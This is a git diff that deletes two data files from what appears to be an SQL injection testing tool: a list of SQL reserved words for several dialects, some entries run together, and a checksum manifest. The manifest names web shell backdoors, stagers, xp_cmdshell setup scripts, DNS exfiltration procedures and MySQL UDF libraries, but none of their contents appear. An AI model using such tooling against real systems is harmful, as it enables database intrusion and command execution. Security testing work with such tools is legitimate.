-INSERT
-INT
-INTEGER
-INTERSECT
-INTERVAL
-INTO
-IS
-ISOLATION
-JOIN
-KEY
-LANGUAGE
-LAST
-LEADING
-LEAVE
-LEFT
-LEVEL
-LIKE
-LOCAL
-LOOP
-LOWER
-MATCH
-MAX
-MIN
-MINUTE
-MODULE
-MONTH
-NAMES
-NATIONAL
-NATURAL
-NCHAR
-NEXT
-NO
-NOT
-NULL
-NULLIF
-NUMERIC
-OCTET_LENGTH
-OF
-ON
-ONLY
-OPEN
-OPTION
-OR
-ORDER
-OUT
-OUTER
-OUTPUT
-OVERLAPS
-PAD
-PARAMETER
-PARTIAL
-PATH
-POSITION
-PRECISION
-PREPARE
-PRESERVE
-PRIMARY
-PRIOR
-PRIVILEGES
-PROCEDURE
-READ
-REAL
-REFERENCES
-RELATIVE
-REPEAT
-RESIGNAL
-RESTRICT
-RETURN
-RETURNS
-REVOKE
-RIGHT
-ROLLBACK
-ROUTINE
-ROWS
-SCHEMA
-SCROLL
-SECOND
-SECTION
-SELECT
-SESSION
-SESSION_USER
-SET
-SIGNAL
-SIZE
-SMALLINT
-SOME
-SPACE
-SPECIFIC
-SQL
-SQLCODE
-SQLERROR
-SQLEXCEPTION
-SQLSTATE
-SQLWARNING
-SUBSTRING
-SUM
-SYSTEM_USER
-TABLE
-TEMPORARY
-THEN
-TIME
-TIMESTAMP
-TIMEZONE_HOUR
-TIMEZONE_MINUTE
-TO
-TRAILING
-TRANSACTION
-TRANSLATE
-TRANSLATION
-TRIM
-TRUE
-UNDO
-UNION
-UNIQUE
-UNKNOWN
-UNTIL
-UPDATE
-UPPER
-USAGE
-USER
-USING
-VALUE
-VALUES
-VARCHAR
-VARYING
-VIEW
-WHEN
-WHENEVER
-WHERE
-WHILE
-WITH
-WORK
-WRITE
-YEAR
-ZONE
-
-# MySQL 5.0 keywords (reference: http://dev.mysql.com/doc/refman/5.0/en/reserved-words.html)
-
-ADD
-ALL
-ALTER
-ANALYZE
-AND
-ASASC
-ASENSITIVE
-BEFORE
-BETWEEN
-BIGINT
-BINARYBLOB
-BOTH
-BY
-CALL
-CASCADE
-CASECHANGE
-CAST
-CHAR
-CHARACTER
-CHECK
-COLLATE
-COLUMN
-CONCAT
-CONDITIONCONSTRAINT
-CONTINUE
-CONVERT
-CREATE
-CROSS
-CURRENT_DATE
-CURRENT_TIMECURRENT_TIMESTAMP
-CURRENT_USER
-CURSOR
-DATABASE
-DATABASES
-DAY_HOUR
-DAY_MICROSECONDDAY_MINUTE
-DAY_SECOND
-DEC
-DECIMAL
-DECLARE
-DEFAULTDELAYED
-DELETE
-DESC
-DESCRIBE
-DETERMINISTIC
-DISTINCTDISTINCTROW
-DIV
-DOUBLE
-DROP
-DUAL
-EACH
-ELSEELSEIF
-ENCLOSED
-ESCAPED
-EXISTS
-EXIT
-EXPLAIN
-FALSEFETCH
-FLOAT
-FLOAT4
-FLOAT8
-FOR
-FORCE
-FOREIGNFROM
-FULLTEXT
-GRANT
-GROUP
-HAVING
-HIGH_PRIORITYHOUR_MICROSECOND
-HOUR_MINUTE
-HOUR_SECOND
-IF
-IFNULL
-IGNORE
-ININDEX
-INFILE
-INNER
-INOUT
-INSENSITIVE
-INSERT
-INTINT1
-INT2
-INT3
-INT4
-INT8
-INTEGER
-INTERVALINTO
-IS
-ISNULL
-ITERATE
-JOIN
-KEY
-KEYS
-KILLLEADING
-LEAVE
-LEFT
-LIKE
-LIMIT
-LINESLOAD
-LOCALTIME
-LOCALTIMESTAMP
-LOCK
-LONG
-LONGBLOBLONGTEXT
-LOOP
-LOW_PRIORITY
-MATCH
-MEDIUMBLOB
-MEDIUMINT
-MEDIUMTEXTMIDDLEINT
-MINUTE_MICROSECOND
-MINUTE_SECOND
-MOD
-MODIFIES
-NATURAL
-NOTNO_WRITE_TO_BINLOG
-NULL
-NUMERIC
-ON
-OPTIMIZE
-OPTION
-OPTIONALLYOR
-ORDER
-OUT
-OUTER
-OUTFILE
-PRECISIONPRIMARY
-PROCEDURE
-PURGE
-READ
-READS
-REALREFERENCES
-REGEXP
-RELEASE
-RENAME
-REPEAT
-REPLACE
-REQUIRERESTRICT
-RETURN
-REVOKE
-RIGHT
-RLIKE
-SCHEMA
-SCHEMASSECOND_MICROSECOND
-SELECT
-SENSITIVE
-SEPARATOR
-SET
-SHOW
-SMALLINTSONAME
-SPATIAL
-SPECIFIC
-SQL
-SQLEXCEPTION
-SQLSTATESQLWARNING
-SQL_BIG_RESULT
-SQL_CALC_FOUND_ROWS
-SQL_SMALL_RESULT
-SSL
-STARTINGSTRAIGHT_JOIN
-TABLE
-TERMINATED
-THEN
-TINYBLOB
-TINYINT
-TINYTEXTTO
-TRAILING
-TRIGGER
-TRUE
-UNDO
-UNION
-UNIQUEUNLOCK
-UNSIGNED
-UPDATE
-USAGE
-USE
-USING
-UTC_DATEUTC_TIME
-UTC_TIMESTAMP
-VALUES
-VARBINARY
-VARCHAR
-VARCHARACTERVARYING
-VERSION
-WHEN
-WHERE
-WHILE
-WITH
-WRITEXOR
-YEAR_MONTH
-ZEROFILL
-
-# MySQL 8.0 keywords (reference: https://dev.mysql.com/doc/refman/8.0/en/keywords.html)
-
-ACCESSIBLE
-ACCOUNT
-ACTION
-ACTIVE
-ADD
-ADMIN
-AFTER
-AGAINST
-AGGREGATE
-ALGORITHM
-ALL
-ALTER
-ALWAYS
-ANALYSE
-ANALYZE
-AND
-ANY
-ARRAY
-AS
-ASC
-ASCII
-ASENSITIVE
-AT
-ATTRIBUTE
-AUTHENTICATION
-AUTOEXTEND_SIZE
-AUTO_INCREMENT
-AVG
-AVG_ROW_LENGTH
-BACKUP
-BEFORE
-BEGIN
-BETWEEN
-BIGINT
-BINARY
-BINLOG
-BIT
-BLOB
-BLOCK
-BOOL
-BOOLEAN
-BOTH
-BTREE
-BUCKETS
-BULK
-BY
-BYTE
-CACHE
-CALL
-CASCADE
-CASCADED
-CASE
-CATALOG_NAME
-CHAIN
-CHALLENGE_RESPONSE
-CHANGE
-CHANGED
-CHANNEL
-CHAR
-CHARACTER
-CHARSET
-CHECK
-CHECKSUM
-CIPHER
-CLASS_ORIGIN
-CLIENT
-CLONE
-CLOSE
-COALESCE
-CODE
-COLLATE
-COLLATION
-COLUMN
-COLUMNS
-COLUMN_FORMAT
-COLUMN_NAME
-COMMENT
-COMMIT
-COMMITTED
-COMPACT
-COMPLETION
-COMPONENT
-COMPRESSED
-COMPRESSION
-CONCURRENT
-CONDITION
-CONNECTION
-CONSISTENT
-CONSTRAINT
-CONSTRAINT_CATALOG
-CONSTRAINT_NAME
-CONSTRAINT_SCHEMA
-CONTAINS
-CONTEXT
-CONTINUE
-CONVERT
-CPU
-CREATE
-CROSS
-CUBE
-CUME_DIST
-CURRENT
-CURRENT_DATE
-CURRENT_TIME
-CURRENT_TIMESTAMP
-CURRENT_USER
-CURSOR
-CURSOR_NAME
-DATA
-DATABASE
-DATABASES
-DATAFILE
-DATE
-DATETIME
-DAY
-DAY_HOUR
-DAY_MICROSECOND
-DAY_MINUTE
-DAY_SECOND
-DEALLOCATE
-DEC
-DECIMAL
-DECLARE
-DEFAULT
-DEFAULT_AUTH
-DEFINER
-DEFINITION
-DELAYED
-DELAY_KEY_WRITE
-DELETE
-DENSE_RANK
-DESC
-DESCRIBE
-DESCRIPTION
-DES_KEY_FILE
-DETERMINISTIC
-DIAGNOSTICS
-DIRECTORY
-DISABLE
-DISCARD
-DISK
-DISTINCT
-DISTINCTROW
-DIV
-DO
-DOUBLE
-DROP
-DUAL
-DUMPFILE
-DUPLICATE
-DYNAMIC
-EACH
-ELSE
-ELSEIF
-EMPTY
-ENABLE
-ENCLOSED
-ENCRYPTION
-END
-ENDS
-ENFORCED
-ENGINE
-ENGINES
-ENGINE_ATTRIBUTE
-ENUM
-ERROR
-ERRORS
-ESCAPE
-ESCAPED
-EVENT
-EVENTS
-EVERY
-EXCEPT
-EXCHANGE
-EXCLUDE
-EXECUTE
-EXISTS
-EXIT
-EXPANSION
-EXPIRE
-EXPLAIN
-EXPORT
-EXTENDED
-EXTENT_SIZE
-FACTOR
-FAILED_LOGIN_ATTEMPTS
-FALSE
-FAST
-FAULTS
-FETCH
-FIELDS
-FILE
-FILE_BLOCK_SIZE
-FILTER
-FINISH
-FIRST
-FIRST_VALUE
-FIXED
-FLOAT
-FLOAT4
-FLOAT8
-FLUSH
-FOLLOWING
-FOLLOWS
-FOR
-FORCE
-FOREIGN
-FORMAT
-FOUND
-FROM
-FULL
-FULLTEXT
-FUNCTION
-GENERAL
-GENERATE
-GENERATED
-GEOMCOLLECTION
-GEOMETRY
-GEOMETRYCOLLECTION
-GET
-GET_FORMAT
-GET_MASTER_PUBLIC_KEY
-GET_SOURCE_PUBLIC_KEY
-GLOBAL
-GRANT
-GRANTS
-GROUP
-GROUPING
-GROUPS
-GROUP_REPLICATION
-GTID_ONLY
-HANDLER
-HASH
-HAVING
-HELP
-HIGH_PRIORITY
-HISTOGRAM
-HISTORY
-HOST
-HOSTS
-HOUR
-HOUR_MICROSECOND
-HOUR_MINUTE
-HOUR_SECOND
-IDENTIFIED
-IF
-IGNORE
-IGNORE_SERVER_IDS
-IMPORT
-IN
-INACTIVE
-INDEX
-INDEXES
-INFILE
-INITIAL
-INITIAL_SIZE
-INITIATE
-INNER
-INOUT
-INSENSITIVE
-INSERT
-INSERT_METHOD
-INSTALL
-INSTANCE
-INT
-INT1
-INT2
-INT3
-INT4
-INT8
-INTEGER
-INTERSECT
-INTERVAL
-INTO
-INVISIBLE
-INVOKER
-IO
-IO_AFTER_GTIDS
-IO_BEFORE_GTIDS
-IO_THREAD
-IPC
-IS
-ISOLATION
-ISSUER
-ITERATE
-JOIN
-JSON
-JSON_TABLE
-JSON_VALUE
-KEY
-KEYRING
-KEYS
-KEY_BLOCK_SIZE
-KILL
-LAG
-LANGUAGE
-LAST
-LAST_VALUE
-LATERAL
-LEAD
-LEADING
-LEAVE
-LEAVES
-LEFT
-LESS
-LEVEL
-LIKE
-LIMIT
-LINEAR
-LINES
-LINESTRING
-LIST
-LOAD
-LOCAL
-LOCALTIME
-LOCALTIMESTAMP
-LOCK
-LOCKED
-LOCKS
-LOGFILE
-LOGS
-LONG
-LONGBLOB
-LONGTEXT
-LOOP
-LOW_PRIORITY
-MASTER
-MASTER_AUTO_POSITION
-MASTER_BIND
-MASTER_COMPRESSION_ALGORITHMS
-MASTER_CONNECT_RETRY
-MASTER_DELAY
-MASTER_HEARTBEAT_PERIOD
-MASTER_HOST
-MASTER_LOG_FILE
-MASTER_LOG_POS
-MASTER_PASSWORD
-MASTER_PORT
-MASTER_PUBLIC_KEY_PATH
-MASTER_RETRY_COUNT
-MASTER_SERVER_ID
-MASTER_SSL
-MASTER_SSL_CA
-MASTER_SSL_CAPATH
-MASTER_SSL_CERT
-MASTER_SSL_CIPHER
-MASTER_SSL_CRL
-MASTER_SSL_CRLPATH
-MASTER_SSL_KEY
-MASTER_SSL_VERIFY_SERVER_CERT
-MASTER_TLS_CIPHERSUITES
-MASTER_TLS_VERSION
-MASTER_USER
-MASTER_ZSTD_COMPRESSION_LEVEL
-MATCH
-MAXVALUE
-MAX_CONNECTIONS_PER_HOUR
-MAX_QUERIES_PER_HOUR
-MAX_ROWS
-MAX_SIZE
-MAX_UPDATES_PER_HOUR
-MAX_USER_CONNECTIONS
-MEDIUM
-MEDIUMBLOB
-MEDIUMINT
-MEDIUMTEXT
-MEMBER
-MEMORY
-MERGE
-MESSAGE_TEXT
-MICROSECOND
-MIDDLEINT
-MIGRATE
-MINUTE
-MINUTE_MICROSECOND
-MINUTE_SECOND
-MIN_ROWS
-MOD
-MODE
-MODIFIES
-MODIFY
-MONTH
-MULTILINESTRING
-MULTIPOINT
-MULTIPOLYGON
-MUTEX
-MYSQL_ERRNO
-NAME
-NAMES
-NATIONAL
-NATURAL
-NCHAR
-NDB
-NDBCLUSTER
-NESTED
-NETWORK_NAMESPACE
-NEVER
-NEW
-NEXT
-NO
-NODEGROUP
-NONE
-NOT
-NOWAIT
-NO_WAIT
-NO_WRITE_TO_BINLOG
-NTH_VALUE
-NTILE
-NULL
-NULLS
-NUMBER
-NUMERIC
-NVARCHAR
-OF
-OFF
-OFFSET
-OJ
-OLD
-ON
-ONE
-ONLY
-OPEN
-OPTIMIZE
-OPTIMIZER_COSTS
-OPTION
-OPTIONAL
-OPTIONALLY
-OPTIONS
-OR
-ORDER
-ORDINALITY
-ORGANIZATION
-OTHERS
-OUT
-OUTER
-OUTFILE
-OVER
-OWNER
-PACK_KEYS
-PAGE
-PARSER
-PARTIAL
-PARTITION
-PARTITIONING
-PARTITIONS
-PASSWORD_LOCK_TIME
-PATH
-PERCENT_RANK
-PERSIST
-PERSIST_ONLY
-PHASE
-PLUGIN
-PLUGINS
-PLUGIN_DIR
-POINT
-POLYGON
-PORT
-PRECEDES
-PRECEDING
-PRECISION
-PREPARE
-PRESERVE
-PREV
-PRIMARY
-PRIVILEGES
-PRIVILEGE_CHECKS_USER
-PROCEDURE
-PROCESS
-PROCESSLIST
-PROFILE
-PROFILES
-PROXY
-PURGE
-QUARTER
-QUERY
-QUICK
-RANDOM
-RANGE
-RANK
-READ
-READS
-READ_ONLY
-READ_WRITE
-REAL
-REBUILD
-RECOVER
-RECURSIVE
-REDOFILE
-REDO_BUFFER_SIZE
-REDUNDANT
-REFERENCE
-REFERENCES
-REGEXP
-REGISTRATION
-RELAY
-RELAYLOG
-RELAY_LOG_FILE
-RELAY_LOG_POS
-RELAY_THREAD
-RELEASE
-RELOAD
-REMOTE
-REMOVE
-RENAME
-REORGANIZE
-REPAIR
-REPEAT
-REPEATABLE
-REPLACE
-REPLICA
-REPLICAS
-REPLICATE_DO_DB
-REPLICATE_DO_TABLE
-REPLICATE_IGNORE_DB
-REPLICATE_IGNORE_TABLE
-REPLICATE_REWRITE_DB
-REPLICATE_WILD_DO_TABLE
-REPLICATE_WILD_IGNORE_TABLE
-REPLICATION
-REQUIRE
-REQUIRE_ROW_FORMAT
-RESET
-RESIGNAL
-RESOURCE
-RESPECT
-RESTART
-RESTORE
-RESTRICT
-RESUME
-RETAIN
-RETURN
-RETURNED_SQLSTATE
-RETURNING
-RETURNS
-REUSE
-REVERSE
-REVOKE
-RIGHT
-RLIKE
-ROLE
-ROLLBACK
-ROLLUP
-ROTATE
-ROUTINE
-ROW
-ROWS
-ROW_COUNT
-ROW_FORMAT
-ROW_NUMBER
-RTREE
-SAVEPOINT
-SCHEDULE
-SCHEMA
-SCHEMAS
-SCHEMA_NAME
-SECOND
-SECONDARY
-SECONDARY_ENGINE
-SECONDARY_ENGINE_ATTRIBUTE
-SECONDARY_LOAD
-SECONDARY_UNLOAD
-SECOND_MICROSECOND
-SECURITY
-SELECT
-SENSITIVE
-SEPARATOR
-SERIAL
-SERIALIZABLE
-SERVER
-SESSION
-SET
-SHARE
-SHOW
-SHUTDOWN
-SIGNAL
-SIGNED
-SIMPLE
-SKIP
-SLAVE
-SLOW
-SMALLINT
-SNAPSHOT
-SOCKET
-SOME
-SONAME
-SOUNDS
-SOURCE
-SOURCE_AUTO_POSITION
-SOURCE_BIND
-SOURCE_COMPRESSION_ALGORITHMS
-SOURCE_CONNECT_RETRY
-SOURCE_DELAY
-SOURCE_HEARTBEAT_PERIOD
-SOURCE_HOST
-SOURCE_LOG_FILE
-SOURCE_LOG_POS
-SOURCE_PASSWORD
-SOURCE_PORT
-SOURCE_PUBLIC_KEY_PATH
-SOURCE_RETRY_COUNT
-SOURCE_SSL
-SOURCE_SSL_CA
-SOURCE_SSL_CAPATH
-SOURCE_SSL_CERT
-SOURCE_SSL_CIPHER
-SOURCE_SSL_CRL
-SOURCE_SSL_CRLPATH
-SOURCE_SSL_KEY
-SOURCE_SSL_VERIFY_SERVER_CERT
-SOURCE_TLS_CIPHERSUITES
-SOURCE_TLS_VERSION
-SOURCE_USER
-SOURCE_ZSTD_COMPRESSION_LEVEL
-SPATIAL
-SPECIFIC
-SQL
-SQLEXCEPTION
-SQLSTATE
-SQLWARNING
-SQL_AFTER_GTIDS
-SQL_AFTER_MTS_GAPS
-SQL_BEFORE_GTIDS
-SQL_BIG_RESULT
-SQL_BUFFER_RESULT
-SQL_CACHE
-SQL_CALC_FOUND_ROWS
-SQL_NO_CACHE
-SQL_SMALL_RESULT
-SQL_THREAD
-SQL_TSI_DAY
-SQL_TSI_HOUR
-SQL_TSI_MINUTE
-SQL_TSI_MONTH
-SQL_TSI_QUARTER
-SQL_TSI_SECOND
-SQL_TSI_WEEK
-SQL_TSI_YEAR
-SRID
-SSL
-STACKED
-START
-STARTING
-STARTS
-STATS_AUTO_RECALC
-STATS_PERSISTENT
-STATS_SAMPLE_PAGES
-STATUS
-STOP
-STORAGE
-STORED
-STRAIGHT_JOIN
-STREAM
-STRING
-SUBCLASS_ORIGIN
-SUBJECT
-SUBPARTITION
-SUBPARTITIONS
-SUPER
-SUSPEND
-SWAPS
-SWITCHES
-SYSTEM
-TABLE
-TABLES
-TABLESPACE
-TABLE_CHECKSUM
-TABLE_NAME
-TEMPORARY
-TEMPTABLE
-TERMINATED
-TEXT
-THAN
-THEN
-THREAD_PRIORITY
-TIES
-TIME
-TIMESTAMP
-TIMESTAMPADD
-TIMESTAMPDIFF
-TINYBLOB
-TINYINT
-TINYTEXT
-TLS
-TO
-TRAILING
-TRANSACTION
-TRIGGER
-TRIGGERS
-TRUE
-TRUNCATE
-TYPE
-TYPES
-UNBOUNDED
-UNCOMMITTED
-UNDEFINED
-UNDO
-UNDOFILE
-UNDO_BUFFER_SIZE
-UNICODE
-UNINSTALL
-UNION
-UNIQUE
-UNKNOWN
-UNLOCK
-UNREGISTER
-UNSIGNED
-UNTIL
-UPDATE
-UPGRADE
-URL
-USAGE
-USE
-USER
-USER_RESOURCES
-USE_FRM
-USING
-UTC_DATE
-UTC_TIME
-UTC_TIMESTAMP
-VALIDATION
-VALUE
-VALUES
-VARBINARY
-VARCHAR
-VARCHARACTER
-VARIABLES
-VARYING
-VCPU
-VIEW
-VIRTUAL
-VISIBLE
-WAIT
-WARNINGS
-WEEK
-WEIGHT_STRING
-WHEN
-WHERE
-WHILE
-WINDOW
-WITH
-WITHOUT
-WORK
-WRAPPER
-WRITE
-X509
-XA
-XID
-XML
-XOR
-YEAR
-YEAR_MONTH
-ZEROFILL
-ZONE
-
-# PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html)
-
-ABS
-ACOS
-ALL
-ALLOCATE
-ALTER
-ANALYSE
-ANALYZE
-AND
-ANY
-ARE
-ARRAY
-ARRAY_AGG
-ARRAY_MAX_CARDINALITY
-AS
-ASC
-ASENSITIVE
-ASIN
-ASYMMETRIC
-AT
-ATAN
-ATOMIC
-AUTHORIZATION
-AVG
-BEGIN
-BEGIN_FRAME
-BEGIN_PARTITION
-BETWEEN
-BIGINT
-BINARY
-BLOB
-BOOLEAN
-BOTH
-BY
-CALL
-CALLED
-CARDINALITY
-CASCADED
-CASE
-CAST
-CEIL
-CEILING
-CHAR
-CHARACTER
-CHARACTER_LENGTH
-CHAR_LENGTH
-CHECK
-CLASSIFIER
-CLOB
-CLOSE
-COALESCE
-COLLATE
-COLLATION
-COLLECT
-COLUMN
-COMMIT
-CONCURRENTLY
-CONDITION
-CONNECT
-CONSTRAINT
-CONTAINS
-CONVERT
-COPY
-CORR
-CORRESPONDING
-COS
-COSH
-COUNT
-COVAR_POP
-COVAR_SAMP
-CREATE
-CROSS
-CUBE
-CUME_DIST
-CURRENT
-CURRENT_CATALOG
-CURRENT_DATE
-CURRENT_DEFAULT_TRANSFORM_GROUP
-CURRENT_PATH
-CURRENT_ROLE
-CURRENT_ROW
-CURRENT_SCHEMA
-CURRENT_TIME
-CURRENT_TIMESTAMP
-CURRENT_TRANSFORM_GROUP_FOR_TYPE
-CURRENT_USER
-CURSOR
-CYCLE
-DATALINK
-DATE
-DAY
-DEALLOCATE
-DEC
-DECFLOAT
-DECIMAL
-DECLARE
-DEFAULT
-DEFERRABLE
-DEFINE
-DELETE
-DENSE_RANK
-DEREF
-DESC
-DESCRIBE
-DETERMINISTIC
-DISCONNECT
-DISTINCT
-DLNEWCOPY
-DLPREVIOUSCOPY
-DLURLCOMPLETE
-DLURLCOMPLETEONLY
-DLURLCOMPLETEWRITE
-DLURLPATH
-DLURLPATHONLY
-DLURLPATHWRITE
-DLURLSCHEME
-DLURLSERVER
-DLVALUE
-DO
-DOUBLE
-DROP
-DYNAMIC
-EACH
-ELEMENT
-ELSE
-EMPTY
-END
-END-EXEC
-END_FRAME
-END_PARTITION
-EQUALS
-ESCAPE
-EVERY
-EXCEPT
-EXEC
-EXECUTE
-EXISTS
-EXP
-EXTERNAL
-EXTRACT
-FALSE
-FETCH
-FILTER
-FIRST_VALUE
-FLOAT
-FLOOR
-FOR
-FOREIGN
-FRAME_ROW
-FREE
-FREEZE
-FROM
-FULL
-FUNCTION
-FUSION
-GET
-GLOBAL
-GRANT
-GROUP
-GROUPING
-GROUPS
-HAVING
-HOLD
-HOUR
-IDENTITY
-ILIKE
-IMPORT
-IN
-INDICATOR
-INITIAL
-INITIALLY
-INNER
-INOUT
-INSENSITIVE
-INSERT
-INT
-INTEGER
-INTERSECT
-INTERSECTION
-INTERVAL
-INTO
-IS
-ISNULL
-JOIN
-JSON_ARRAY
-JSON_ARRAYAGG
-JSON_EXISTS
-JSON_OBJECT
-JSON_OBJECTAGG
-JSON_QUERY
-JSON_TABLE
-JSON_TABLE_PRIMITIVE
-JSON_VALUE
-LAG
-LANGUAGE
-LARGE
-LAST_VALUE
-LATERAL
-LEAD
-LEADING
-LEFT
-LIKE
-LIKE_REGEX
-LIMIT
-LISTAGG
-LN
-LOCAL
-LOCALTIME
-LOCALTIMESTAMP
-LOG
-LOG10
-LOWER
-MATCH
-MATCHES
-MATCH_NUMBER
-MATCH_RECOGNIZE
-MAX
-MEASURES
-MEMBER
-MERGE
-METHOD
-MIN
-MINUTE
-MOD
-MODIFIES
-MODULE
-MONTH
-MULTISET
-NATIONAL
-NATURAL
-NCHAR
-NCLOB
-NEW
-NO
-NONE
-NORMALIZE
-NOT
-NOTNULL
-NTH_VALUE
-NTILE
-NULL
-NULLIF
-NUMERIC
-OCCURRENCES_REGEX
-OCTET_LENGTH
-OF
-OFFSET
-OLD
-OMIT
-ON
-ONE
-ONLY
-OPEN
-OR
-ORDER
-OUT
-OUTER
-OVER
-OVERLAPS
-OVERLAY
-PARAMETER
-PARTITION
-PATTERN
-PER
-PERCENT
-PERCENTILE_CONT
-PERCENTILE_DISC
-PERCENT_RANK
-PERIOD
-PERMUTE
-PLACING
-PORTION
-POSITION
-POSITION_REGEX
-POWER
-PRECEDES
-PRECISION
-PREPARE
-PRIMARY
-PROCEDURE
-PTF
-RANGE
-RANK
-READS
-REAL
-RECURSIVE
-REF
-REFERENCES
-REFERENCING
-REGR_AVGX
-REGR_AVGY
-REGR_COUNT
-REGR_INTERCEPT
-REGR_R2
-REGR_SLOPE
-REGR_SXX
-REGR_SXY
-REGR_SYY
-RELEASE
-RESULT
-RETURN
-RETURNING
-RETURNS
-REVOKE
-RIGHT
-ROLLBACK
-ROLLUP
-ROW
-ROWS
-ROW_NUMBER
-RUNNING
-SAVEPOINT
-SCOPE
-SCROLL
-SEARCH
-SECOND
-SEEK
-SELECT
-SENSITIVE
-SESSION_USER
-SET
-SHOW
-SIMILAR
-SIN
-SINH
-SKIP
-SMALLINT
-SOME
-SPECIFIC
-SPECIFICTYPE
-SQL
-SQLEXCEPTION
-SQLSTATE
-SQLWARNING
-SQRT
-START
-STATIC
-STDDEV_POP
-STDDEV_SAMP
-SUBMULTISET
-SUBSET
-SUBSTRING
-SUBSTRING_REGEX
-SUCCEEDS
-SUM
-SYMMETRIC
-SYSTEM
-SYSTEM_TIME
-SYSTEM_USER
-TABLE
-TABLESAMPLE
-TAN
-TANH
-THEN
-TIME
-TIMESTAMP
-TIMEZONE_HOUR
-TIMEZONE_MINUTE
-TO
-TRAILING
-TRANSLATE
-TRANSLATE_REGEX
-TRANSLATION
-TREAT
-TRIGGER
-TRIM
-TRIM_ARRAY
-TRUE
-TRUNCATE
-UESCAPE
-UNION
-UNIQUE
-UNKNOWN
-UNMATCHED
-UNNEST
-UPDATE
-UPPER
-USER
-USING
-VALUE
-VALUES
-VALUE_OF
-VARBINARY
-VARCHAR
-VARIADIC
-VARYING
-VAR_POP
-VAR_SAMP
-VERBOSE
-VERSIONING
-WHEN
-WHENEVER
-WHERE
-WIDTH_BUCKET
-WINDOW
-WITH
-WITHIN
-WITHOUT
-XML
-XMLAGG
-XMLATTRIBUTES
-XMLBINARY
-XMLCAST
-XMLCOMMENT
-XMLCONCAT
-XMLDOCUMENT
-XMLELEMENT
-XMLEXISTS
-XMLFOREST
-XMLITERATE
-XMLNAMESPACES
-XMLPARSE
-XMLPI
-XMLQUERY
-XMLSERIALIZE
-XMLTABLE
-XMLTEXT
-XMLVALIDATE
-YEAR
-
-# Misc
-
-ORD
-MID
diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt
deleted file mode 100644
index 44707cbcdba..00000000000
--- a/data/txt/sha256sums.txt
+++ /dev/null
@@ -1,631 +0,0 @@
-39a8a35d730f49daf657fa58903a9cd309813b275df29a86439297a10a15261a data/html/index.html
-e70317eb90f7d649e4320e59b2791b8eb5810c8cad8bc0c49d917eac966b0f18 data/procs/mssqlserver/activate_sp_oacreate.sql
-6a2de9f090c06bd77824e15ac01d2dc11637290cf9a5d60c00bf5f42ac6f7120 data/procs/mssqlserver/configure_openrowset.sql
-798f74471b19be1e6b1688846631b2e397c1a923ad8eca923c1ac93fc94739ad data/procs/mssqlserver/configure_xp_cmdshell.sql
-5dfaeac6e7ed4c3b56fc75b3c3a594b8458effa4856c0237e1b48405c309f421 data/procs/mssqlserver/create_new_xp_cmdshell.sql
-3c8944fbd4d77b530af2c72cbabeb78ebfb90f01055a794eede00b7974a115d0 data/procs/mssqlserver/disable_xp_cmdshell_2000.sql
-afb169095dc36176ffdd4efab9e6bb9ed905874469aac81e0ba265bc6652caa4 data/procs/mssqlserver/dns_request.sql
-657d56f764c84092ff4bd10b8fcbde95c13780071b715df0af1bc92b7dd284f2 data/procs/mssqlserver/enable_xp_cmdshell_2000.sql
-1b7d521faca0f69a62c39e0e4267e18a66f8313b22b760617098b7f697a5c81d data/procs/mssqlserver/run_statement_as_user.sql
-9b8b6e430c705866c738dd3544b032b0099a917d91c85d2b25a8a5610c92bcdf data/procs/mysql/dns_request.sql
-02b7ef3e56d8346cc4e06baa85b608b0650a8c7e3b52705781a691741fc41bfb data/procs/mysql/write_file_limit.sql
-02be5ce785214cb9cac8f0eab10128d6f39f5f5de990dea8819774986d0a7900 data/procs/oracle/dns_request.sql
-606fe26228598128c88bda035986281f117879ac7ff5833d88e293c156adc117 data/procs/oracle/read_file_export_extension.sql
-4d448d4b7d8bc60ab2eeedfe16f7aa70c60d73aa6820d647815d02a65b1af9eb data/procs/postgresql/dns_request.sql
-7e3e28eac7f9ef0dea0a6a4cdb1ce9c41f28dd2ee0127008adbfa088d40ef137 data/procs/README.txt
-3fa42f7428a91d94e792ad8d3cb76109cfe2632d918ae046e32be5a2b51ad3d8 data/shell/backdoors/backdoor.asp_
-7943c1d1e8c037f5466f90ed91cc88441beb0efab83ef5ae98473d2aee770b65 data/shell/backdoors/backdoor.aspx_
-9d9d0bdd4145df96058977a39be924f0facdba9efa7b585848101dafbcb7b02e data/shell/backdoors/backdoor.jsp_
-8a7a73a4c841e92ece79942e03a18df046f90ba43e6af6c4f8fbb77f437bce07 data/shell/backdoors/backdoor.php_
-a08e09c1020eae40b71650c9b0ac3c3842166db639fdcfc149310fc8cf536f64 data/shell/README.txt
-67ce7eec132297594f7fd31f93f8d044df3d745c01c70c5afc320848eb4aa149 data/shell/stagers/stager.asp_
-099eb0f9ed71946eb55bd1d4afa1f1f7ef9f39cc41af4897f3d5139524bd2fc2 data/shell/stagers/stager.aspx_
-f2648a0cb4d5922d58b8aa6600f786b32324b9ac91e3a57e4ff212e901ffe151 data/shell/stagers/stager.jsp_
-84b431647a2c13e72b2c9c9242a578349d1b8eef596166128e08f1056d7e4ac8 data/shell/stagers/stager.php_
-26e2a6d6154cbcef1410a6826169463129380f70a840f848dce4236b686efb23 data/txt/common-columns.txt
-22cda9937e1801f15370e7cb784797f06c9c86ad8a97db19e732ae76671c7f37 data/txt/common-files.txt
-30b3eecf7beb4ebbfdb3aadbd7d7d2ad2a477f07753e5ed1de940693c8b145dc data/txt/common-outputs.txt
-7953f5967da237115739ee0f0fe8b0ecec7cdac4830770acb8238e6570422a28 data/txt/common-tables.txt
-b023d7207e5e96a27696ec7ea1d32f9de59f1a269fde7672a8509cb3f0909cd3 data/txt/keywords.txt
-29a0a6a2c2d94e44899e867590bae865bdf97ba17484c649002d1d8faaf3e127 data/txt/smalldict.txt
-aaf6be92d51eb502ba11136c7a010872b17c4df59007fc6de78ae665fe66ee5f data/txt/user-agents.txt
-9c2d6a0e96176447ab8758f8de96e6a681aa0c074cd0eca497712246d8f410c6 data/txt/wordlist.tx_
-849c61612bd0d773971254df2cc76cc18b3d2db4051a8f508643278a166df44e data/udf/mysql/linux/32/lib_mysqludf_sys.so_
-20b5a80b8044da1a0d5c5343c6cbc5b71947c5464e088af466a3fcd89c2881ef data/udf/mysql/linux/64/lib_mysqludf_sys.so_
-8e6ae0e3d67e47261df064aa1536f99e56d4f001cc7f800c3d93b091c3c73115 data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
-51d055d00863655e43e683377257953a19728a0ae9a3fe406768289474eb4104 data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
